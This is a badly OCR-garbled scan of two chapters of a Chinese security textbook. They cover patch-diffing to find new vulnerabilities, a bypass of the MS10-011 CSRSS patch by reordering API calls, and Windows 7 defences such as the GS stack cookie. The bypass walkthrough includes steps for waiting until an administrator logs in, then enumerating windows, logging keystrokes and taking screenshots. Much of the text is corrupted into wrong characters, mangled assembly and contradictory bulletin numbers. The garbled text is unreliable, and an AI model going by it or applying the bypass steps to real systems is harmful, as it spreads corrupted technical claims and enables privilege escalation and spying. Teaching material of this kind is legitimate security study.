体 安全 汤 洞 ,安全 人 研究 者 往往 进行 大 量 的 重复 工作 ,人 研究 效率 和 效果 上 也 有 
相应 的 局 限 性 。 因 此 ,快速 高效 和 准确 挖掘 软件 中 隐蔽 的 安全 漏洞 成 为 最 
近 相 关 人 研究 的 热点 和 难点 。 

近年 来 ,基于 补丁 比 对 的 漏洞 分 析 技 术 取 得 了 显 着 进展 ,与 以 往 拉 术 相 
比 , 该 技术 具有 速度 快 、 定 位 准确 的 特点 。 补 丁 比 对 提高 了 定位 二 进 制 文件 
安全 油 洞 的 效率 , 它 作为 一 种 软件 安全 狂 洞 分 析 技 术 和 化 广 记 使 用 。 但 补丁 实 
施 之 后 市 来 的 安全 隐患 一 下 未 被 业界 所 重视 。 

针对 上 述 人 情况 ,本章 通过 补丁 比 对 分 析 提 出 一 种 基于 补丁 比 对 的 软件 安 
全 狂 洞 挖掘 方法 。 相 比 现 有 的 软件 安全 漏洞 挖掘 方法 ,该 方法 分 析 粒 度 更 
细 ,能 挖掘 到 补丁 后 更 加 隐蔽 的 安全 漏洞 。 该 方法 对 发 布 钉 丁 广 商 和 软件 安 
EMEA AA ERSZ OME 

AKA EC E a i] — FB AC HH BM ZS Fr RR A 2 EB BS E BH Sb Se GE A 
MAJER]. HAD TAS EY BE AS ZS a HJ EE TE FE 
原 程 序 中 引用 新 的 安全 漏洞 ,主要 存在 以 下 三 类 安全 隐患 。 

C1) 漏洞 上 商 修补 漏洞 缺乏 全 局 考虑 ,通过 注重 对 洗 洞 点 的 修补 。 在 复 
杂 系 统 中 ,与 本 漏洞 相同 或 相似 特征 属性 的 漏洞 在 系统 中 可 能 还 会 存在 ,而 
此 时 由 于 安全 补丁 松露 了 一 种 湄 洞 特征 属性 ,分 析 人 员 可 以 利用 这 种 源 洞 特 
征 属性 来 挖掘 其 他 未 知 洗 洞 。 

(2) 软件 厂商 对 源 洞 代码 进行 修改 时 ,往往 只 考虑 当前 涯 洞 的 上 下 文 环 
境 , 而 未 必 考 虑 到 整个 系统 或 第 三 方 代码 对 全 局 变量 或 逻辑 条 件 市 来 的 


i= EA 
EAM 
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(3) 软件 厂商 进行 补丁 开发 ,一 般 修改 省 洞 点 对 应 或 相关 的 源 代码 。 但 从 源 代码 的 角 


度 进 行 修改 ,未 必 能 考虑 到 真实 逆 回 分 析 环 境 中 出 现 的 各 类 复 灯 情况 。 
自 先 介绍 补丁 比 对 的 概念 和 分 类 ,补丁 比 对 主要 有 3 种 方法 : 基于 文本 的 比 对 、 基 于 汇 
编 指令 的 比 对 及 基于 结构 化 的 比 对 。 其 中 ,基于 文本 的 比 对 指 的 是 对 两 个 二 进 制 文件 进行 
对 比 , 对 文件 比 对 中 出 现 的 任何 差异 , 改 不 做 处 理 地 写 入 结 
RLP; 基于 汇编 指令 的 比 对 是 先 对 二 进 制 文件 进行 反 汇 
分 析 补 丁 ， 找 由 补丁 所 修补 的 编 ,然后 将 两 个 反 汇 编 之 后 的 文件 进行 对 比 ,更 容易 被 分 析 
i 人 员 理 解 ; 基于 结构 化 的 比 对 指 的 是 给 定 两 个 每 比 对 的 文 
| VF REE TT AY SL PR CA Ts i D | OK Ze as. ECT PLAT EL 28 
同 构建 立 函数 间 一 一 映射 。 


在 补丁 比 对 的 基础 上 ,人 们 探究 基于 安全 补丁 比 对 的 


调 洞 控 掘 拉 术 基本 流程 ,如 图 16-1 所 示 。 
在 图 16-1 中 ,分析 补丁 人 们 可 以 采用 上 文中 摘 述 的 3 


种 方法 ,常用 的 补丁 比 对 工具 有 IDA Pro, BinaryDiff 等 。 
判断 代码 内 是 否 存在 安全 漏洞 路 径 查 找 能 够 找到 所 有 可 能 的 执行 路 径 。 条 件 执行 会 尝试 
执行 这 些 路 径 ,以 判断 当前 路 径 是 否 是 实际 可 执行 的 ,符号 
执行 通过 代码 变量 的 逻辑 抽象 与 控制 流 相 结合 得 到 条 件 约 
束 ,最 后 通过 约束 求解 的 方法 ,来 判断 代码 内 部 是 否 存在 安 


软件 安全 补丁 面临 安全 隐患 











图 16-1 基于 补丁 比 对 的 漏洞 
挖掘 技术 流程 


16.1.1 参考 安全 补丁 的 漏洞 分 析 方法 实现 原理 


通过 对 安全 和 补丁 的 分 析 , 可 以 找 出 补丁 所 修补 的 代码 位 置 (Patch Location, fj PR P 点 ) 
及 实际 出 现 问 题 的 代码 位 置 (Bug Location. ,简称 B 点 )。 在 实际 环境 中 ,B 点 一 般 是 一 个 漏 
洞 点 ,但 P 点 可 能 是 一 个 补丁 点 或 多 个 补丁 点 的 集合 。 如 果 从 代码 执行 开始 ,每 条 到 达 节 
点 也 的 路 径 都 要 经 过 布点 了 , 则 控制 流 图 中 市 点 卫 是 市 点 也 的 必 经 节点 。 根 据 BAA PA 
的 相对 位 置 关系 ,大 致 可 以 分 为 以 下 4 种 情况 。 

COD B 点 和 P 点 重合 。 直 接 修改 漏洞 代码 ,如 蔡 换 漏洞 代码 所 在 的 基本 块 或 不 安全 困 
数 、 直 接 修 改 和 触发 漏洞 代码 所 在 的 基本 块 或 不 安全 图 数 .、 直接 修改 和 触 发 漏洞 点 的 逻辑 条 
件 等 。 

(2) BAM P 点 位 于 同一 函数 中 。 如 果 P 点 不 是 BB 点 的 必 经 节点 ,存在 其 他 路 径 绕 过 
P RANA B 点 , 则 说 明 该 漏洞 修补 可 能 存在 其 他 安全 隐患 。 

(3) B 点 和 了 点 集合 中 的 某 个 补丁 点 Pn 位 于 同一 基本 块 中 。Pn 是 B 点 的 必 经 节 
点 ,如果 Pn 的 逻辑 控制 条 件 与 系统 中 可 能 调用 到 的 其 他 函数 相关 , 即 其 他 困 数 可 能 修 
改 Pn 的 逻辑 控制 条 件 , 在 触发 其 他 相关 因数 后 仍然 可 以 触发 B 点 , 则 漏洞 修补 存在 安 
全 隐患 。 

(4) 也 点 和 了 P 点 位 于 不 同 的 基本 块 中 , 且 B 点 和 了 P 点 分 布 在 不 同 图 数 中 。 漏 洞 代 码 和 
修补 代码 ,位 于 不 同 函 数 中 ,这 种 安全 源 洞 修补 方式 ,最 有 可 能 存在 安全 隐患 。 由 于 系统 也 
数 调用 关系 相当 复杂 ,如 果 对 每 个 函数 调用 参数 的 约束 和 检查 不 到 位 ,污点 数据 的 动态 传递 
很 可 能 重新 出 现 漏 洞 代码 而 导致 新 的 安全 隐患 。 
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16.1.2 参考 安全 补丁 的 漏洞 分 析 方 法 形式 化 描述 


情况 一 : B 点 和 了 P 点 重合 的 情况 ,经 过 研究 和 以 往 案例 的 总 结 ,推测 该 类 漏洞 修复 方式 
| 般 不 会 引入 新 的 安全 隐患 

情况 二 : 使 用 形式 化 语言 描述 满足 触发 漏洞 的 程序 执行 过 程 如 下 。 

(1) CG(Call Graph) 为 程序 中 畏 数 调用 图 ,CG 图 可 以 表述 为 一 个 三 元 组 有 问 图 G = 
(FF, 下 ,entry)。 其 中 ,F Rime; E RIM SOARS. RP wae F VA S — 1 PR 
AE, 的 有 问 边 <F;,， F; >; entry 表示 人 口 晒 数 集合 entryEF。 

(2) CFG(Control Flow Graph) 为 图 数控 制 流 图 ,CFG 表述 为 一 个 四 元 组 有 问 图 G= 
(N,F,entry,exit)。 其 中 ,NN 未 示 一 个 图 数 中 各 个 万 氮 集 合 ; E RRMA A Ni 转移 到 
男 一 个 节点 N; 的 有 问 边 <N;,，Ni >; entry 表示 图 数 人 口 节 点 集合 entry € N; exit FAN PR 
数 出 口 节 点 集合 exitE N 。 

(3) 点 开始 ,所 有 到 达 节 点 a 的 路 径 都 要 经 过 节点 5, 则 称 节 点 5 为 节点 a 的 
必 经 市 点 

(4) 设 入 也 点 所 在 的 函数 为 F, P 点 所 在 的 图 数 为 内 。 则 查找 存在 问题 的 路 径 为 : 从 入 
O 图 数 Fentry 开始 到 达 F, FASE F, 的 路 径 。 从 Fentry R F, 到达 F, 的 路 径 分 为 两 
种 情况 ,CG 图 查找 路 径 和 CFG 图 查找 路 径 。 

(5) CG 图 查找 路 径 , P— (Ps, Fi, Foo Fu Fa) Fo =Fentry, RPE F, =F,, 
且 任 意 0zzjzniWxEF;-F,. 

(6) CFG 图 查找 路 径 : 第 5 步 , 满 足 第 5 步 的 条 件 , 函 数 F 调用 F471; 则 从 函数 下 ;到 
开始 调用 也 数 下 ;4 所 执行 的 路 径 为 P<F;, Fj4i>= 二 (No, Nis Noo Noa Na) No = 
Nentry. N, 是 调用 函数 下 ,+ 的 基本 模块 。 

最 终 找到 的 PONI P «F;. 下 ;41> 痢 是 满足 触发 源 洞 的 代码 执行 路 径 。 

情况 三 ; F, MFE p MTER N, PCF, Fis Fus Faz, F,),Fo=Fentry, 
Sj <i 夺 nn, 其 中 存在 F =F, Fi =F, TEME P==(Fo, Fi Foe s Fjo Fj) 0555 
n.j7-i, BSE P 满足 触发 源 洞 代码 的 执行 路 径 。 

情况 四 : F 位 于 基本 块 N; "PLE, 位 于 基本 块 Ni PAS. AEE PF, Fini >= 
(No, Ni, No. Niste Njottts Na Na) No Nentry. N; ETF N; 运行 ;路径 P<F,， 
Fy +1 >W A ft Az d Tl (NS AY DUET ER 46 


16.1.3 参考 安全 仆 丁 的 漏洞 分 析 方 法 实例 分 析 


Visi MS11-010 为 例 可 以 进一步 证 明基 于 补丁 比 对 的 漏洞 挖掘 技术 的 有 效 性 。 该 汤 
洞 是 在 分 析 MS10-011 安全 补丁 的 基础 上 ,采用 本 方法 发 现 的 一 个 新 的 安全 漏洞 。 

MS10-011 补丁 为 上 文中 列举 的 情况 四 ,B 点 和 P 点 位 于 不 同 的 函数 中 ,补丁 增加 了 运 
行 至 也 点 的 逻辑 条 件 ,而 这 个 逻辑 条 件 是 普通 用 户 构 造 某 些 函数 进行 特定 序列 调用 可 以 进 
行 修改 的 ,从 而 导致 逻辑 条 件 被 非法 利用 ,出 现 新 的 安全 隐患 。 

MS10-011 有 一 人 处 重要 的 补丁 ,补丁 前 和 补丁 后 的 反 汇 编 代 码 分 别 如 图 16-2 和 图 16-3 
所 示 。 
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.Lext: 
.text: 
.text- 
-text: 
-text 
-text 
.text: 
.text: 
.text: 
.text: 


.text: 
-text 
-text 
-text 
.Lext 
-text 
.text:- 
.text: 
.text: 
.text: 
.text: 


?S5AA4S5SEA 
7SAA4SSED 
?SAA4SSFO 
fSAA4SSFS 


- #SAA4SSFG 
- #SAASSFO 


#SAASSFC 
?5RR55FE 
?580805681 
75AA46 64 


eax, [ebp*var 8] 

[edi+24h], eax 

Pax, [ebp*var 18] 
[edi*28h], eax 

eax, [ebp*var 15] 

ecx, [ebp*var 18] 

PCX, Pax 

[edi*2C6h], ecx 

[ebp*var 8] 

ds :HtCompleteConnectPort (x) 


图 16-2 补丁 前 反 汇 编 代 码 片 段 ( 一 ) 


fSAAR4SSEA 


- #SAA4S5ED 
- #SAA4SSF B 
-?SAA4SSFS 
-? SAAS5F6 
- ?SAA4SSFO 


FSAAR4SSFC 
75AA46606 
7580805682 
75hR05685 
T5fh0h056808 


eax, [ebp*var 8] 
[edi*2hh], eax 

eax, [ebp*var 18] 
[edi+28h], eax 

eax, [ebp*var 14] 

ecx, [ebp*var 18] 

byte ptr [edi+39h], 28h 
ecx, eax 

[edi*2Ch], ecx 
[ebp*var 8] 

ds :-NtConpleteConnectPort (x) 


图 16-3 补丁 后 反 汇 编 代 码 片 段 (一 ) 


由 图 16-3 中 可 知 , 打 补丁 后 ,添加 了 汇编 语句 or byte ptr Ledi 十 39hj,20h, 该 段 代 码 位 
T pki 2 CsrApiHandleConnectionRequest(O) 中 。 下 面 摘 述 这 处 补丁 的 实现 育 景 。 

C1) 在 进程 创建 的 时 候 , 将 会 连接 Csrss 建立 的 ApiPort 端口 。 

(2) 传递 给 Csrss 的 LPC 消息 类 型 为 LPC_CONNECTION_REQUEST(0xA)。 

(3) 在 CsrApiRequest Thread PR Zi P Ab PRIZE YA OB Bir 358] FH HJ eK 207 «Csr ApiHandle- 


ConnectionRequest 。 


CsrApiHandleConnectionReques PR A HJ Ab FE Fe UE F. 
(1) 调用 CsrSrvAttachSharedSection PR Zi ,在 它 内 部 调用 NtMapViewOfSection ,将 名 
Wk JJ CsrSrvSharedSection 的 共享 内 存 区 映射 到 进程 地 址 空间 中 。 如 果 映 射 成 功 , 则 返回 


0 ,否则 返回 NtMapViewOfSection 的 出 错 状 态 。 


(2) 如 果 CsrSrvAttachSharedSection 返回 0, 在 调用 NtAcceptConnectPort 时 将 创建 
一 个 通信 端口 ,将 该 通信 端口 的 句柄 填充 到 CSR PROCESS 结构 体 的 HANDLE 


ClientPort 成 员 。 


(3) 在 创建 通信 端口 成 功 的 情况 下 ,调用 NtCompleteConnectPort 完成 连接 ,并 将 CSR 
_PROCESS_FlagsLlj 第 6 比特 置 为 1, 在 其 操作 对 应 补丁 中 添加 汇编 语句“or byte ptr [ edi 


+39h],20h”. 


下 面 分 析 MS 10-011 中 的 另 一 处 重要 补丁 , 补 于 前 和 补丁 后 的 代码 段 分 别 如 几 16-4 和 


图 16-5 所 示 。 


text: 75AA52BA 
text -75AA52BD 
text: /5AA52C6 


or 
push 
call 


[eax+38h], ecx 
dword ptr [esi*?28h] 
CsrLockedDereferenceProcess(x) 


图 16-4 补丁 前 反 汇 编 代 码 片 段 ( 二 ) 


图 16-4 和 图 16-5 rpm fend Ez fi F PR BL CsrRemoveThread 中 ,图 16-5 中 也 添加 了 一 个 
补丁 语句 test byte ptr [eax 十 39hj,20h, 该 处 补丁 语句 与 前 一 处 补丁 形成 呼应 。CsrRe- 
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text: 75AA5S365 mov eax, [esi*28h] 

text: 75AASS68 test byte ptr [eax+39h], 28h 

text: 75AAS36C jnz short loc 75f88537R 

text: 75AASS6C 

text: /SAAS36E or byte ptr [eax+39h], 2 
text:7580805372 push dword ptr [esis28h] 
Ltext:/bhn5375 call CsrLockedDereferenceProcess(x) 


Al 16-5 补丁 后 反 汇 编 代 码 片 段 ( 二 ) 


moveThread py aM CsrThreadHashTable 数组 中 移 除 线程 CSR THREAD 的 信息 ; 从 
CsrThreadHashTable 数组 中 移 除 线程 信息 ,将 线程 所 属 进程 的 线程 计数 减 1, 如 果 进 程 的 
线程 计数 为 0, 并 且 CSR_PROCESS_FlagsL1j] 第 6 比特 为 0, 则 调用 CsrLockedDereferen- 
ceProcess PR ZI, 

通过 上 述 分 析 , Pl Al MS10-011 补丁 只 是 做 了 一 个 开关 的 处 理 , 只 要 此 时 CSR 
PROCESS_FlagsLl] 为 0, 就 回 到 了 CVE-2010-0023 的 利用 原点 。 


16.2. ABA eB ICE Val H dea led dr BAN 


Bia Windows 系统 已 经 在 各 行 各 业 广 泛 应 用 ,Windows 平台 下 软件 也 得 到 了 极 大 的 
丰 训 和 完善 。 然 而 ,作为 整个 Windows 软件 平台 的 基石 ,Windows 操作 系统 的 安全 问题 却 
层出不穷 ,频频 被 作为 攻击 对 象 。 与 系统 相关 的 漏洞 ,更 是 有 着 危害 性 强 、 不 易 发 现 .高 权限 
等 特点 。 因 此 对 系统 类 汤 洞 挖掘 方法 进行 深入 分 析 人 研究 是 非常 有 必要 的 。 

针对 当前 发 现 内 核 级 漏洞 代价 高 、 难度 大 、 耗 时 入, 方法 缺失 等 特点 ,本 提出 了 
种 新 的 内 核 级 漏洞 挖掘 方 法 ,从 而 提升 洗 洞 挖掘 效率 ,增加 挖掘 的 准确 度 , 并 减少 狂 报 和 
Vit. 

系统 内 核 函数 作为 调用 操作 系统 抵 层 功能 的 接口 ,用 于 完成 众多 系统 级 的 抵 层 功能 , 系 
统 内 核 函数 往往 需要 得 到 较 大 的 权限 ,如 I/O 访问、 内 存 分 配 释 放 等 ,在 此 过 程 中 ,由 于 软 
件 的 缺陷 而 产生 的 诸如 拒绝 服务 或 权限 提升 的 漏洞 层出不穷 。 操 作 系 统 提供 了 一 系列 应 用 
JZ API 用 于 实现 应 用 程序 所 需 的 功能 ,这 些 API 中 封装 了 对 系统 内 核 函 数 的 调用 。 本 方法 
通过 分 析 API 中 系统 内 核 孙 数 的 调用 顺序 和 参数 特征 ,构建 系统 内 核 妇 数 无 序 调用 模型 ， 
并 进行 测试 ,从 而 发 现 因 内 核 函数 无 订 调 用 而 引起 的 内 核 级 汤 洞 。 

下 面 痛 先 介 绍 一 下 Windows 系统 调用 机 制 。Windows 系统 调用 是 存在 于 Windows 
系统 中 的 一 个 天 键 接口 , 它 提 供 了 将 用 户 模 式 下 的 请 求 转发 到 Windows 内 核 的 功能 ,并 引 
发 处 理 带 模式 的 切换 。 图 16-6 CreateFile() 的 调用 流程 图 。 

在 图 16-6 中 ,Win32 AK API 经 过 Kernel32. dll/advapi32. dll 进入 NTDLL. dll 后 使 
用 int 0x2e 中 断 进 入 内 核 , 最 后 在 Ntoskrnl. exe 中 实现 了 真正 的 系统 调用 。 内 核 使 用 系统 
服务 号 对 系统 服务 调度 表 (System Service Dispatch Table,SSDT) 中 的 系统 服务 进行 查找 。 
在 系统 服务 调度 表 中 的 每 一 项 包含 了 一 个 指向 系统 服务 程序 的 指针 。Windows 系统 调用 
机 制 的 细节 可 以 参考 4 Windows 驱动 开发 技术 详解 》。 

现在 考虑 跨 过 Windows API, 直接 向 中 介 函 数 “ntdlllNt ** /user32! Nt ** /GDI32 ! Nt ** ” 
传递 参数 ,如 图 16-7 Prax. 
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Ntdll!NtCreateFile 
mov eax,25h - 

mov edx, 7FFE0300h 
call dword pir[edx] 


retn 2Ch 服务 号 (下 标 ) 


Ntdll!KiFastSystemCall 


mov  edx,esp 
sysenter 


Ring 3 


Ring 0 KeServiceDescriptorTable 





SSDT( KiServiceTable) 
PDWORD SSDT 表 地 址 





0x00 nt!NtAcceptConnectPort |" PDWORD 没 用 


0x01 nt!NtAccessCheck PWORD ^E 
| 0x25 nt!NtCreateFile 


0x35 nt! NtCreateThread 





Ox7A nt!NtOpenProcess 


图 16-6 ”CreateFile() 调 用 流程 图 


Windows API main( ) 


ntdll'Ntxx user32!Ntxx GDI32!Ntxx 


mov eax, XXX 
mov edx, 7FFE0300h 
call — dword ptr [edx] 
retn XX 


Ring3 
x c Ring 0 


图 16-7 ”直接 向 中 介 函 数 传递 参数 





在 图 16-7 中 ,main() 直接 将 参数 7FFE0300h 传递 给 中 介 图 数 , 并 调用 7FFE0300h 地 
址 人 处 的 指令 ,从 而 绕 过 Windows API, m E B5 ntdll/user32/GDI FJ 2238 «3X 9L Je R Sb VJ TZ 
图 数 无 序 调用 的 一 种 形式 。 

通常 ,一 个 功能 的 实现 会 依赖 一 组 API 调用 序列 (序列 中 的 API 一 般 情 况 下 是 
Undocumented APD ,但 是 如 果 任 意 改 变 该 组 序列 ,会 得 到 一 些 意 想 不 到 的 结果 ,包括 系统 
M ADEST. X API 调用 序列 的 改变 主要 有 以 下 3 种 方式 。 
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CD 对 序列 中 的 函数 多 次 调用 。 

(2) 改变 调用 顺序 。 

(3) 修改 特定 的 条 件 或 参数 。 

FAME API ALAA a Seat MS10-011 补丁 的 过 程 。 

XH] ApiPort 时 ,系统 会 回 Csrss 发 送 一 个 类 型 为 LPC PORT. CLOSED(Ox5) ff 1H 
。 在 CsrApiRequest Thread 图 数 中 处 理 该 类 型 消息 的 代码 如 图 16-8 Aras. 


.text:75füfh78ü and byte ptr [eax+39h], 8DFh 
-text:7SAAL784 mou eax, [ebp+var_1C] 

-Cext: /SAA4S/8? cmp [eax+58h], esi 

-text: /SAA4S/8A ]nz short loc 75885798 

-text: /SAA4S/8A 

-text:7S5AA4S78C or byte ptr [eax*39h], 2 
.Lext:75n65798 push [ebp*var 16] 

.Lext:75885793 call CsrLockedDereferencePracess(x) 


图 16-83 ”处理 LPC PORT. CLOSED(O0x5) HARE 


正常 的 执行 流程 和 使 用 API 乱 序 组 合 绕 过 MS10-011 补丁 的 过 程 分 别 如 图 16-9 和 
图 16-10 所 示 。 


连接 ApiPort， 置 标识 为 ] 连接 ApiPort， 置 标识 为 1 


i5] FH BaseSrvExitProcess EK Zi 关闭 ApiPort， 直 标识 为 


标识 为 1，5 引 用 计数 为 1 调用 BaseSrvExitProcess 国 数 


BRIHJgO. 75 itO, BI 
关闭 ApiPort， 置 标识 为 0 标识 为 y a 成 功 





图 16-9 正常 的 执行 流程 16-10 ”使 用 API 乱 序 组 合 绕 过 MS10-011 补丁 


图 16-9 中 的 过 程 摘 述 如 下 。 

(1) 当 进 程 正常 运行 时 ,调用 NtSecureConnectPort 负数 连接 ApiPort 端口 ,建立 第 二 

(2) 调用 CloseHandle 函数 关闭 第 二 次 连接 的 ApiPort vg O 8] Aj » 3x FE n] WA Fy IZ 

过 补丁 的 关键 代码 “and byte ptr Leax 十 39h ,0DFh” 后 ,进程 的 CSR PROCESS. Flags| 1 | 第 

6 比特 会 置 为 0。 

(3) 调用 CreateThread 新 建 一 个 线程 ,在 新 建 的 线程 中 调用 CsrClientCallServer pk 3X . 
第 三 个 参数 设 为 0x10003 ,激活 BaseSrvExitProcess PRIM ,实现 进程 CSR PROCESS 结构 的 
删除 。 

(4) 进入 睡眠 ,等 待 管理 员 用 户 或 其 他 高 权限 用 户 登 录 , 可 以 进行 枚 举 窗 口 .记录 键盘 
信息 .进行 截屏 等 一 系列 操作 。 

对 比 图 16-9 和 图 16-10 ,可 以 发 现 API 调用 序列 发 生 了 改变 ,从 而 达到 了 绕 过 MS10- 
011 的 效果 。 
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16.3 ”本草 小 结 


本 章 主 要 介绍 了 两 种 新 型 的 漏洞 分 析 方 法 ,分 别 是 参考 安全 补丁 的 漏洞 分 析 方 法 和 系 
统 内 核 函 数 无 序 调 用 漏洞 分 析 方 法 。 以 漏洞 MS11-010 为 例 , 分 别 介 绍 了 使 用 上 述 两 种 方 
法 分 析 漏 洞 的 实例 。 


>J 16 


l. "AR Dp ZFR f E PR P xa A SE Pas h SU IRL BS] FCR Dr E HK BO AKA B 
点 和 了 点 的 相对 位 置 天 系 可 以 分 为 哪儿 种 情况 ? 

2. 在 通过 无 序 调用 系统 内 核 限 数 的 漏洞 分 析 方 法 中 ,对 API 调用 序列 的 改变 的 3 种 方 
式 分别 是 什么 ? 

3. 何 述 攻击 痢 如 何 通 过 无 序 调 用 系统 内 核 邹 数 实现 统 过 MS11-010 补丁 。 


新 型 操作 系统 第 17 章 
内 存 安全 机 制 分 析 


17.1 Windows 7 的 内 存 保护 机 制 


为 了 对 抗 传统 的 针对 Windows 操作 系统 的 攻击 方式 ,Windows 7 引入 
了 一 整套 的 防御 体系 ,涉及 攻击 者 可 能 利用 的 各 个 方面 ,用 到 的 技术 如 图 17-1 


所 示 。 


Generic S H 
Exploit —— (E SafeSEH Code Protected 
Mitigation Manager WRP Signing process 





Restricted Windows Windows 
Services Defender Update 
inea is PatchGuard p 
Kernel Integrity Cee System Integrity 
ol BitLocker And User-mode 
Firewall 
Defenses 


图 17-1 Windows 7 抵御 缓冲 区 溢出 技术 








针对 内 存 攻击 的 几 个 关键 路 径 ，Windows 7 的 操作 系统 通过 ASLR、 
DEP, GS 和 SafeSEH 等 关键 拉 术 进行 防护 ,在 不 同 关 键 路 径 点 给 攻击 者 制造 
了 层 层 障 碍 ,增加 了 缓冲 区 溢出 攻击 难度 ,提升 了 系统 的 安全 性 。 如 图 17-2 所 
IR GS 栈 保护 技术 保护 了 返回 地 址 和 图 数 指针 ，SafeSEH 技术 保护 了 SEH 
节点 ,ASLR 技术 使 攻击 者 无 法 定位 shellcode 地 址 和 系统 调用 地 址 ,DEP 4% 
术 使 位 于 栈 和 堆 等 位 置 的 shelleode FIA IE HIATT. PERAK SE A The MA 
互补 元 ,构成 了 Windows 7 抵御 组 冲 区 次 出 机 制 的 完整 体系 。 
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挖掘 缓冲 区 次 出 漏洞 ， 和 广 人 攻击 代码 Shellecode 


FE Æ SEH A SafeSEH 


味 转 到 Shellcode 地 址 ASLR 
执行 Shellcode DEP 


图 17-2 Windows 7 抵御 缓冲 区 溢出 攻击 体系 






覆盖 返回 地 址 或 函数 指针 D 


其 抵御 缓冲 区 湾 出 机 制 的 工作 流程 可 以 总 结 为 图 17-3 所 示 的 流程 。 





返回 上 一 级 函数 


LU v 


程序 运行 ， 
PE 基 址 、 


栈 地 址 、 
PEB 利 TEB 
地 址 随机 化 





对 SEH 进 行 合 
法 性 校 验 


处 理 结束 ， 返 回 
图 17-3 Windows 7 抵御 缓冲 区 混 出 工作 流程 


17.1.1 GS 保护 机 制 分 析 


GS 是 VC++ 编 译 器 提供 的 一 个 编译 选项 ,对 栈 中 内 容 进 行 检查 和 保护 ,以 阻止 攻击 
者 通过 栈 中 缓冲 区 洪 出 运行 恶意 代码 。GS 编 详 选项 最 早 是 在 Visual Studio 2002 中 引入 
的 ,迄今 为 止 已 经 更 新 了 多 个 版 本 。 运 用 了 GS 机 制 之 后 ,每 个 映像 文件 (exe 或 d) 在 加 
载 人 内 存 的 时 候 都 会 获得 一 个 独一无二 的 32 位 的 随机 数 , 即 cookie fA. FUR T GS 选项 
的 高 版 本 编译 需 在 编 详 文件 的 时 候 会 增加 额外 的 一 个 果 数 security_init_cookie, 该 困 数 
会 在 运行 主 程序 之 前 运行 ,是 程序 加 载 时 最 先 运 行 的 几 个 初始 化 函数 之 一 。 标 准 栈 帧 如 
图 17-4(a) 所 示 ,Windows 7 系统 中 的 文件 主要 由 Visual Studio 2003 (VS2003) 和 Visual 
Studio 2005 (VS2005) 2h VÉ ss Zh FE Tf] BY. 2 FA Visual Studio 2003 GS 的 栈 帆布 局 如 图 17-4 (b) 
所 示 。 
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第 17 章 EE ERE PR HEP TEX SML DH 


低地 址 无 GC 有 GC 


Callee Save Register Callee Save Register 


异常 处 理 框架 Fe Fs SU EERE AR 
框架 指针 


a 


(存放 在 EBP) cookie 
— 
- 返回 地 址 





高 地 址 
(a) (b) 


17-4 标准 栈 帧 布局 和 加 入 GS 选项 之 后 的 栈 帧 布局 对 比 


GS 编译 选项 在 函数 结束 处 增加 也 会 增加 代码 。 当 攻击 者 利用 缓冲 区 洲 出 对 返回 地 址 
DEITA m TR S l TAE GS cookie 的 值 , 这 时 编 详 着 在 图 数 退 回 时 牢 外 增加 的 代码 会 
调用 _security_check_cookie() 困 数 检 查 stack cookie 是 否 被 修改 ,如 果 发 现 cookie 被 改变 ， 
将 会 终止 当前 程序 并 报销 。 一 个 典型 的 GS 保护 的 反 汇 编 代 人 码 如 下 。 


; prologue 

push ebp 

mov ebp, esp 

sub esp, 214h 

mov eax, security cookie ; random value, initialized at startup 


xor eax, ebp 


mov [ebp + var4], eax ; store the cookie 
; epilogue 
mov ecx, [ebp + var 4] ; get the cookie from the stack 


xor ecx, ebp 

call security check cookie ; check the cookie 
leave 

retn 0Ch 


GS cookie 是 一 个 伪 随 机 数 , 在 进程 启动 时 ,这 个 值 由 系统 调用 security. init cookie 
滑 数 计算 出 来 ,保存 在 加 载 模 块 的 ”security_cookie variable 中 。 它 的 厚 始 存 储 地 址 和 程序 
映像 基 址 的 相对 位 移 是 一 定 的 ,由 于 系统 中 局 用 ASLR 技术 ,GS cookie 的 存储 地 址 也 是 随 
机 的 。 

在 cookie 计算 的 过 程 中 ， security init cookie PK ZU 7L 4a VH [E] 17-5 所 示 。 

cookie 生成 过 程 如 下 , 它 会 通过 GetSystemTimeAsFileTime 来 查询 当前 系统 时 间 , 获 
得 的 值 是 一 个 精确 到 100nm 的 64 比特 的 整 型 数值 ,高 32 比特 和 低 32 比特 数据 进行 XOR 
运算 产生 cookie 的 第 一 步 结 果 记 作 C1. A esi 4A: 第 二 步 通 过 GetCurrentProcessId pk Rv 
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出 络 攻防 原理 及 应 用 
* .text - 4h Bh B2B56 push esi 
* . text: 46462857 lea eax, [ebp+systine ] 
* .text- h Bh n2B5f push Pax ; LpSystemTimeAsFileTime 
* .text:hahg2B5B call ds: inp GetSystemTimefisFileTime(àà ; GetSystemTimefsFileTime(x) 
* .text - 4h 8h 82B6 1 nou esi, dword ptr [ebp+systime+4] 
* .text: 4B 02B6h xor esi, dword ptr [ebp+systine ] 
* .text 46462867 call ds: inp GetCurrentProcessId@6@ ; GetCurrentProcessIdí) 
* ~text : 46402660 xor Psi, eax 
* . text : 4 Bh D2B6GF call ds: imp GetCurrentThreadId(38 ; GetCurrentThreadId() 
* .text-h Bh g2B75 xor esi, Pax 
* .text-4B8502B77 call ds: imp GetTickCount@@ ; GetTickCount(í) 
* .ktext:h8582B7D xor esi, Pax 
* text -4646287F lea eax, [ebp*perfctr] 
^ text 464626882 push Pax >; LpPerformanceCount 
* text -46462B83 call ds: imp QueryPerformanceCounter@4 ; QueryPerformanceCounter(x) 
* .text: 4 a5 g2B89 nou eax, dword ptr [ebp+perfetr+4] 
* text -46460288C xor eax, dword ptr [ebp*perfFctr] 
* .text:hBhg2B8F Xor esi, eax 
* text - 4 8h 82B9 1 cmp esi, edi 
* text - 4 Bh 02B03 jnz short loc 4O462B9C 
^ .text - 464602695 now esi, BBBhüE6hFh 
* .text :4 85 02B9fi jnp short loc h568582Bfn? 


17-5 | security init cookie PK ZI J JC Zhi 


查询 当前 进程 的 进程 标识 符 , 并 与 之 前 的 Cl 进行 XOR ,获得 第 二 个 数 C2; 第 三 步 通 过 
GetCurrentThreadId 困 数 获取 当前 线程 的 信息 ,结果 与 CZ 进行 XOR 运算 ,获得 第 三 个 中 
间 数 C3; 第 四 步调 用 GetTickCount 函数 获取 CPU 有 关 信 息 , 将 结果 与 C3 继续 进行 
XOR ,获得 第 四 个 中 则 数 C4; 第 五 步调 用 QueryPerformanceCounter PR 2& . 3X EH AY Zi HR n 
同系 统 时 间 一 样 ,是 个 64 比特 的 数据 ,该 结果 的 高 32 比特 与 低 32 比特 进行 XOR 运算 , 获 
得 第 五 个 中 间 数 C5; 第 六 步 对 C4 和 C5 进行 XOR 运算 ,结果 记 作 C6; 第 七 步 将 C6 与 一 


